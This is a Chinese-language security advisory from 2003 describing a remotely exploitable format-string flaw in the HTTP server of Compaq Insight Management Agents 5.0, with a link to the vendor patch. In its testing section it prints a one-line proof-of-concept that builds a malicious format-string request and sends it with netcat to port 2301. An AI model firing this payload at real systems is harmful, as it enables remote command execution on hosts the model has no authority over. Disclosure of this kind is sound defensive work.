发布日期：2003-08-04
更新日期：2003-08-08

受影响系统：

Compaq Insight Management Agents 5.0 H

描述：

---

BUGTRAQ  ID: 8336

Compaq Management Agents (CMA)是Compaq公司提供的网络管理软件。

Compaq Management Agents包含的HTTP服务器存在格式字符串问题，远程攻击者可以利用这个漏洞精心提交恶意请求，可以本地系统权限在系统上执行任意指令。

问题是HTTP服务器对用户提交的URL参数请求缺少正确过滤，提交包含格式字符串的数据可导致破坏堆栈内存信息，精心构建格式字符串数据可能以本地系统权限在系统上执行任意指令。

<*来源：mcw （mcw@wcd.se）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

mcw （mcw@wcd.se）提供了如下测试方法：

$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301

建议：

---

厂商补丁：

Compaq
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://h18013.www1.hp.com/products/servers/management/cim7-overview.html

浏览次数：3198
严重程度：0（网友投票）